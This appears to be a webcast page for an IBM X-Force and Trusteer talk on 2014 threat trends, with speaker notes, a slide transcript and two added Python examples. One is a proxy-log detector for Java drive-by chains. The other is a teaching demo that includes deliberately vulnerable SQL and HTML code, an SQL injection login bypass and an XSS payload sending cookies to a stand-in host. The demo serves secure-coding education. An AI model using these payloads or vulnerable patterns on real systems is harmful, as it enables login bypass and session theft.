Follow the Money, Follow the Crime

Cyber crime is growing in both frequency and sophistication. We all know it is out there but do we know what to look for? Do we know how to combat it? Arm yourself with the latest updates from the X-Force Report of current security risks & trends happening today and our solutions from Trusteer, an IBM company to help you stay one step ahead of cybercriminals.

View the full on-demand webcast: https://www.youtube.com/watch?v=axEV2aa2k4k

Speaker notes

  • Advanced Security and Threat Research, which includes the X-Force team, is the foundation for many of the pillars in the security product portfolio. As the team tasked with staying on top of the latest threats and vulnerabilities, the information it provides is a critical part of protecting the other parts of the framework.
  • With more than 6,000 researchers, developers and subject matter experts engaged in security initiatives, IBM operates one of the world’s broadest enterprise security research, development and delivery organizations. This combination of expertise is made up of the award-winning X-Force research and development team, with one of the largest vulnerability databases in the industry, and includes nine security operations centers, nine IBM Research centers, 14 software security development labs and the IBM Institute for Advanced Security with chapters in the United States, Europe and the Asia Pacific region.
    – Security Operations Centers: Atlanta, Georgia; Boulder, Colorado; Brussels, Belgium; Tokyo, Japan; Brisbane, Australia; Hortolandia, Brazil; Bangalore, India; Wroclaw, Poland. (NO: Detroit, Michigan; Toronto, Canada. ADD: Riyadh, Saudi Arabia; Heredia, Costa Rica.)
    – Security Research Centers: Yorktown Heights, NY; Atlanta, GA; Almaden, CA; Ottawa, Canada; Zurich, CH; Kassel, DE; Herzliya, IL; Haifa, IL; New Delhi, IN; Tokyo, JP
    – Security Development Labs: Littleton, MA; Raleigh, NC; Atlanta, GA; Austin, TX; Costa Mesa, CA; Fredericton, Canada; Toronto, CAN; Ottawa, CAN; Belfast, NIR; Delft, NL; Pune, IN; Bangalore, IN; Taipei, TW; Singapore, SG; Gold Coast, AU
    – Note: IBM patent search performed by Paul Landsberg, IBM IP Office
  • IBM X-Force has a long-standing history as one of the best known commercial security research and development groups in the world. It can leverage security expertise across IBM to better understand what is happening in security, and it has numerous intelligence sources:
    – A database of more than 76K security vulnerabilities, monitored every day
    – A global web crawler
    – International spam collectors
    – Close work with the IBM managed security services group, who monitor over 15B security events every day from nearly 4,000 security clients in over 133 countries
    All of this is done to stay ahead of continuing threats for our customers. Our global web crawler is probably the world’s third largest behind Google and Bing. It crawls the web, and we have analyzed and classified over 17B web pages. X-Force is particularly interested in files, images, or pages that contain malicious links or content. The team in Kassel, Germany that builds our web crawler also developed an anti-spam product. We have spam traps around the world and receive large amounts of spam so that we can analyze and understand the different types and preemptively block that spam. Our work covers four key areas: research, engines, content delivery, and industry/customer deliverables such as this X-Force report, blogs, articles, presentations and speaking engagements.
  • Attackers are optimizing their operations around several key initiatives, including a path of least resistance to reach the largest number of potential targets for the minimal amount of exploit effort. For example, attackers are optimizing various points of weak entry:
    – The exploitation of trust via social media
    – Coordinated operations leaking user data, as well as exploiting weak entry points into global brands such as foreign local-language or franchise sites
    – Mobile malware on Android devices as the market expands
    – Takeover of central strategic targets to access and exploit a broader base of end users
    – Diversion and distraction techniques which throw security administrators off path while targets are breached under cover
    – Cross-platform 0-days were an optimization story as well
  • 2012 was a record year for reported data breaches and security incidents, with a 40 percent increase in total volume over 2011. In the first half of 2013, security incidents had already surpassed the total number reported in 2011 and were on track to surpass 2012. This year kicked off with a number of high-profile, sophisticated attacks on major websites, media, and tech companies.
  • Figure 3 illustrates the possible financial impact of a data breach, in terms of fines, loss of intellectual property, loss of customer trust, loss of capital and so on, that an organization of any size might face. Additionally, of the sampling of security incidents reported by X-Force in 2013, more than three quarters of the attack targets continue to be located in the United States. This could be because many websites are operated from the United States, or because it is more common for U.S. companies and websites to disclose publicly.
  • Attackers use spear-phishing messages to draw users to websites that contain hidden malicious Java applets (exploit sites). Once the user accesses the exploit site, the hidden Java applet exploits vulnerabilities to cause a chain of events that end with the delivery of the malware to the user’s machine, without the user’s awareness. Fifty percent (50%) of the exploits observed by X-Force malware research (Trusteer) in December 2013 targeted Java vulnerabilities indicating Java as a high risk application and top target, exposing organizations to attacks.
  • MH note: maybe hint that we still didn't reach 10K vulnerabilities in a year, even though we modified the CVE numbering scheme to handle it; just thinking of interesting things to talk about. The declines in vulnerabilities demonstrated at the end of 2013 in both XSS and SQL injection, shown in Figure 11, could indicate that developers are doing a better job at writing secure web applications, or possibly that traditional targets like content management systems (CMSs) and plug-ins are maturing as older vulnerabilities have been patched. As noted previously, XSS and SQL injection exploitation continue to be observed in high numbers, indicating there are still legacy systems or other unpatched web applications that remain vulnerable. This is expected, considering there are many thousands of blogs and other websites run by individuals who may not have the skills or awareness to update to later versions of their platform or framework.
  • The most prevalent consequence of vulnerability exploitation was "Gain Access" at 26% of all vulnerabilities reported in 2013. Cross-Site Scripting was the second most prevalent consequence at 18% and typically involves attacks against Web applications.
  • However, vulnerabilities in key reporting areas such as web applications, cross-site scripting and SQL injection all showed downward trends in 2013. Overall, web application vulnerabilities accounted for 33 percent of those publicly reported, down from 43 percent in 2012. The possible reasons for the XSS and SQL injection declines, and the continued high volume of XSS and SQL injection exploitation against legacy and unpatched sites, are as described in the note above.
  • X-Force catalogs two categories of exploit: exploit and true exploit. Simple snippets with proof-of-concept code are counted as exploits, while fully functional programs capable of standalone attacks are categorized separately as true exploits. Publicly available and disclosed true exploits have continued to decrease over the past five years to the lowest levels we’ve seen since 2006. At the end of 2012 we reported that total true exploits were still down overall, and at the end of 2013 we see this trend continue.
  • MH already talked about this. Unpatched vulnerabilities are a big problem: did you know that 60% of exploits target one- to two-year-old vulnerabilities?
  • Java is a widely deployed high risk application that exposes organizations to advanced attacks. The number of Java vulnerabilities has continued to rise over the years, and 2013 was no exception. The number of reported Java vulnerabilities jumped significantly between 2012 and 2013, more than tripling.
  • Java applicative exploits are more difficult to defend against because they let the applet gain unrestricted privileges by defeating the Java security manager, which makes the malicious activity look legitimate at the OS level: it is the trusted Java process doing the work. This means that, unlike native exploits, Java applicative exploits completely bypass native OS-level protections. They also do not rely on memory corruption such as a buffer overflow, and hence are not prevented by memory-safety mitigations such as DEP, ASLR, SEHOP and others. A native exploit, by contrast, results in running native shellcode and is accomplished by techniques that include buffer overflow, use-after-free and more.
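The spear-phishing to exploit-site to Java-applet to malware-drop chain described in the note on weaponized content above (and on slides 11 to 13 and 23) leaves a recognisable sequence in web proxy logs. The following Python script is an added example, not code from the X-Force report or from Trusteer: it flags a client that fetched a JAR from a host outside a hypothetical allowlist and then downloaded an executable within a minute. The log format, hostnames, allowlist and time window are all constructed for illustration.

```python
"""Flag the spear-phish -> exploit site -> Java applet -> malware-drop chain
in web proxy logs.  Added example: not code from the X-Force report or from
Trusteer.  Log format, hostnames, allowlist and window are constructed."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed proxy log: timestamp, client, method, URL, status, content type.
# Client 10.1.1.5 is the drive-by victim; 10.1.1.9 fetches a JAR from an
# allowlisted internal host; 10.1.1.12 downloads an installer 35 minutes after
# an unrelated JAR, outside the correlation window.
SAMPLE_LOG = """\
2014-03-19T09:00:01 10.1.1.5 GET http://mail.example-corp.test/inbox 200 text/html
2014-03-19T09:00:07 10.1.1.5 GET http://invoice-portal-update.test/index.php 200 text/html
2014-03-19T09:00:08 10.1.1.5 GET http://invoice-portal-update.test/app/ld.jar 200 application/java-archive
2014-03-19T09:00:11 10.1.1.5 GET http://invoice-portal-update.test/dl/8a3.exe 200 application/x-msdownload
2014-03-19T09:05:00 10.1.1.9 GET http://intranet.example-corp.test/tools/viewer.jar 200 application/java-archive
2014-03-19T09:05:30 10.1.1.9 GET http://cdn.example-vendor.test/setup.exe 200 application/x-msdownload
2014-03-19T09:10:00 10.1.1.12 GET http://cdn.example-vendor.test/viewer.jar 200 application/java-archive
2014-03-19T09:45:00 10.1.1.12 GET http://cdn.example-vendor.test/setup.exe 200 application/x-msdownload
"""

LINE_RE = re.compile(r"^(\S+) (\S+) (\S+) (\S+) (\d{3}) (\S+)$")
JAR_TYPES = {"application/java-archive", "application/x-java-archive"}
EXE_TYPES = {"application/x-msdownload", "application/x-dosexec",
             "application/octet-stream"}
# Hypothetical allowlist of internal hosts that legitimately serve applets.
TRUSTED_JAR_HOSTS = {"intranet.example-corp.test"}
# How long after the applet fetch a dropper download still counts as related.
WINDOW = timedelta(seconds=60)


def parse(log_text):
    """Turn the constructed log format into a list of event dicts."""
    events = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # skip malformed lines rather than fail the whole run
        ts, client, _method, url, status, ctype = m.groups()
        host = re.match(r"https?://([^/]+)", url).group(1)
        events.append({"ts": datetime.fromisoformat(ts), "client": client,
                       "url": url, "host": host, "status": int(status),
                       "ctype": ctype})
    return events


def detect_drive_by(log_text):
    """Return one alert per client where a successful JAR fetch from a
    non-allowlisted host was followed within WINDOW by an executable download."""
    by_client = defaultdict(list)
    for e in parse(log_text):
        by_client[e["client"]].append(e)
    alerts = []
    for client, evs in by_client.items():
        evs.sort(key=lambda e: e["ts"])
        for i, jar in enumerate(evs):
            if (jar["ctype"] not in JAR_TYPES or jar["status"] != 200
                    or jar["host"] in TRUSTED_JAR_HOSTS):
                continue
            # Look forward from the applet fetch for the dropper.
            for later in evs[i + 1:]:
                if later["ts"] - jar["ts"] > WINDOW:
                    break
                if later["ctype"] in EXE_TYPES and later["status"] == 200:
                    gap = int((later["ts"] - jar["ts"]).total_seconds())
                    alerts.append({"client": client, "jar": jar["url"],
                                   "drop": later["url"], "seconds": gap})
                    break
    return alerts


if __name__ == "__main__":
    for alert in detect_drive_by(SAMPLE_LOG):
        print(alert)
```

Content-type and extension matching is a triage heuristic, not a control: an exploit site can serve the applet with a generic content type, the dropper can arrive over TLS the proxy does not inspect, and a fixed window misses staged downloads. The check is useful for narrowing a day of proxy logs to a few hosts worth investigating; the deck's point is that the exploit stage and the malicious-behaviour stage on the endpoint are the chokepoints where the chain can be blocked regardless of which JAR or dropper was used.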
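The XSS and SQL injection exploitation that the notes for slides 14 to 16 say is still observed in high numbers comes from two code patterns that are easy to recognise once seen side by side. As an added example, not from the X-Force report, the Python script below shows a login query built by string concatenation next to the parameterised version, and a reflected-XSS response next to the output-encoded one, against a constructed in-memory SQLite table. The usernames, passwords and payloads are constructed; passwords are stored in plaintext only to keep the example short, which a real system must never do.

```python
"""SQL injection and reflected XSS: the vulnerable pattern beside the fix.
Added example; not code from the X-Force report.  Table contents and
payloads are constructed for illustration."""
import html
import sqlite3


def make_db():
    """Constructed user table.  Plaintext passwords are used only to keep the
    example short; real systems store salted password hashes."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT, display_name TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", [
        ("alice", "correct horse", "Alice"),
        ("bob", "hunter2", "Bob"),
    ])
    return conn


def login_vulnerable(conn, username, password):
    """String concatenation: the user's input becomes part of the SQL text,
    so a quote in the input changes the grammar of the statement."""
    query = ("SELECT display_name FROM users WHERE username = '" + username
             + "' AND password = '" + password + "'")
    row = conn.execute(query).fetchone()
    return row[0] if row else None


def login_fixed(conn, username, password):
    """Parameterised query: the input is bound as a value and compared with the
    column; it is never parsed as SQL, whatever characters it contains."""
    row = conn.execute(
        "SELECT display_name FROM users WHERE username = ? AND password = ?",
        (username, password)).fetchone()
    return row[0] if row else None


def greet_vulnerable(name):
    """Reflected XSS: untrusted input is interpolated into HTML unescaped."""
    return "<p>Hello, " + name + "</p>"


def greet_fixed(name):
    """Output encoding for the HTML text context: < > & " ' become entities,
    so the browser renders the payload as text instead of executing it."""
    return "<p>Hello, " + html.escape(name, quote=True) + "</p>"


# Constructed attacker inputs.  The SQL payload closes the quoted string,
# adds an always-true clause and comments out the password check.
SQLI_USER = "admin' OR 1=1 --"
XSS_PAYLOAD = "<script>new Image().src='http://evil.test/?c='+document.cookie</script>"


if __name__ == "__main__":
    conn = make_db()
    print("vulnerable login:", login_vulnerable(conn, SQLI_USER, "wrong"))
    print("fixed login:     ", login_fixed(conn, SQLI_USER, "wrong"))
    print(greet_vulnerable(XSS_PAYLOAD))
    print(greet_fixed(XSS_PAYLOAD))
```

The vulnerable login returns a display name for a password that matches nothing, because the `--` in the payload turns the password comparison into a comment; the parameterised version returns nothing for the same input and still works for a genuine user. For XSS the fix is context-dependent: `html.escape` is right for text between tags, while attribute values, URLs and script blocks each need their own encoding, which is why templating engines that escape by default are preferable to hand-built strings.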

Transcript

  • 1. Follow the Money, Follow the Crime. IBM Security Systems, 19th March 2014. © 2014 IBM Corporation
  • 2. Agenda
    – IBM X-Force Threat Intelligence Quarterly 1Q 2014 – Michael Hamelin, Lead X-Force Security Architect, CTO Office, IBM Security Systems
    – Protecting Enterprise Endpoints against Advanced Malware with Trusteer Apex – Dana Tamir, Director of Enterprise Security, Trusteer, an IBM Company
    – Connect with IBM Security
    – Questions?
  • 3. IBM X-Force Threat Intelligence Quarterly 1Q 2014. Michael Hamelin, Lead X-Force Security Architect, CTO Office, IBM Security Systems
  • 4. X-Force is the foundation for advanced security and threat research across the IBM Security Framework
  • 5. At IBM, the world is our security lab: 6,000+ IBM researchers, developers, and subject matter experts focused on security; 3,000+ IBM security patents; Security Operations Centers; Security Research and Development Labs; Institute for Advanced Security branches
  • 6. Collaborative IBM teams monitor and analyze the changing threat landscape
    – Coverage: 20,000+ devices under contract; 3,700+ managed clients worldwide; 15B+ events managed per day; 133 monitored countries (MSS); 1,000+ security-related patents
    – Depth: 17B analyzed web pages and images; 40M spam and phishing attacks; 76K documented vulnerabilities; billions of intrusion attempts daily; millions of unique malware samples
  • 7. Attackers optimize and refine target selection
  • 8. More than half a billion records of personally identifiable information (PII) were leaked in 2013
  • 9. (no text on slide)
  • 10. What is the impact of a data breach and where are customers most affected?
  • 11. Weaponized content focused on end user apps
  • 12. Attackers use exploit kits to deliver payloads
    – Blackhole Exploit Kit: most popular in 2013; creator arrested in October
    – Styx Exploit Kit: rising in popularity; successful in exploiting IE and Firefox on Windows
  • 13. Effectively targeting end users
    – Watering hole: attacker injects malware on a special interest website; vulnerable niche users exploited
    – Malvertising: attacker injects malware on an ad network; malicious ad embedded on legitimate websites; vulnerable users exploited
  • 14. Web app vulnerabilities: the dominant threat
    – Production applications: developed in house; acquired; off-the-shelf commercial apps
    – Applications in development: in-house development; outsourced development
  • 15. Vulnerabilities designed to gain additional or unauthorized access: exploitation, gain access. XSS typically attacks web apps
  • 16. Declines in key reporting – web app vulns
    – Could indicate: a better job at writing secure web applications; CMS systems and plugins maturing as older vulns are patched
    – Attacks continue: XSS and SQLi exploitation still observed in high numbers
  • 17. Declines in key reporting – true exploits
    – Two categories tracked: proof-of-concept code; fully functional programs capable of attacks are true exploits
    – Continue to decrease: lowest levels we’ve seen in the past 5 years
  • 18. Protecting Enterprise Endpoints against Advanced Malware with Trusteer Apex. Dana Tamir, Director of Enterprise Security, Trusteer, an IBM Company
  • 19. About Trusteer
  • 20. APTs and Targeted Attacks. The tool of choice: exploits and advanced malware
    – The entry point: vulnerable user endpoints
    – The means: exploits, drive-by download; advanced malware; compromised credentials
  • 21. Vulnerability disclosures leveled out in 2013, but attackers have plenty of older, unpatched systems to exploit. 60% of the exploits target vulnerabilities that have been publicly known for over 12 months.
  • 22. Do you patch applications? (Source: Ponemon)
  • 23. The threat lifecycle: exploit chain, then data exfiltration. Countermeasures: exploit chain disruption; data exfiltration prevention
  • 24. Controlling strategic chokepoints to break the threat lifecycle. The chart plots number of types against attack progression:
    – Exploit chain: weaponized content, endless (IPS, sandbox); unpatched and zero-day vulnerabilities, many (patching); ways to deliver and infect, hundreds; malicious files, endless (AV, whitelisting)
    – Data exfiltration: malicious behavior, many (HIPS); ways to establish communication channels, hundreds; destinations, endless (C&C traffic detection)
    – Two of these stages are marked on the slide as strategic chokepoints
  • 25. Trusteer Apex: 3 security layers
  • 26. A few words about Java. A powerful yet dangerous application. Did you know that Java is installed on ~85% of desktop computers? (Source: Google Analytics)
  • 27. Explosive growth of Java vulnerabilities, combined with a presence in every enterprise, makes Java the top target for exploits.
  • 28. Most successful Java exploits are applicative, exploiting vulnerabilities related to the Java security manager and bypassing native OS-level protections.
    – Applicative exploits: difficult to defend; gain unrestricted privileges; bypass native OS-level protections
    – Native exploits: buffer overflow; illegal memory use; use-after-free
  • 29. Java execution should be monitored and controlled
    – Prevent exploitation of both native and applicative vulnerabilities
    – Execution of Java code on the endpoint must be restricted; fine-grained control is needed
    – Oracle’s solution: allow execution of signed JARs. Not good enough
  • 30. Connect with IBM Security. Follow us at @ibmxforce and @ibmsecurity. X-Force Security Insights blog at www.SecurityIntelligence.com/x-force. Download IBM X-Force Threat Intelligence Reports: http://www.ibm.com/security/xforce/. Trusteer Apex: https://www.trusteer.com/products/trusteer-apex
  • 31. www.ibm.com/security. © Copyright IBM Corporation 2013. All rights reserved. The information contained in these materials is provided for informational purposes only, and is provided AS IS without warranty of any kind, express or implied. IBM shall not be responsible for any damages arising out of the use of, or otherwise related to, these materials. Nothing contained in these materials is intended to, nor shall have the effect of, creating any warranties or representations from IBM or its suppliers or licensors, or altering the terms and conditions of the applicable license agreement governing the use of IBM software. References in these materials to IBM products, programs, or services do not imply that they will be available in all countries in which IBM operates. Product release dates and/or capabilities referenced in these materials may change at any time at IBM’s sole discretion based on market opportunities or other factors, and are not intended to be a commitment to future product or feature availability in any way. IBM, the IBM logo, and other IBM products and services are trademarks of the International Business Machines Corporation, in the United States, other countries or both. Other company, product, or service names may be trademarks or service marks of others. Statement of Good Security Practices: IT system security involves protecting systems and information through prevention, detection and response to improper access from within and outside your enterprise. Improper access can result in information being altered, destroyed or misappropriated or can result in damage to or misuse of your systems, including to attack others. No IT system or product should be considered completely secure and no single product or security measure can be completely effective in preventing improper access. IBM systems and products are designed to be part of a comprehensive security approach, which will necessarily involve additional operational procedures, and may require other systems, products or services to be most effective. IBM DOES NOT WARRANT THAT SYSTEMS AND PRODUCTS ARE IMMUNE FROM THE MALICIOUS OR ILLEGAL CONDUCT OF ANY PARTY.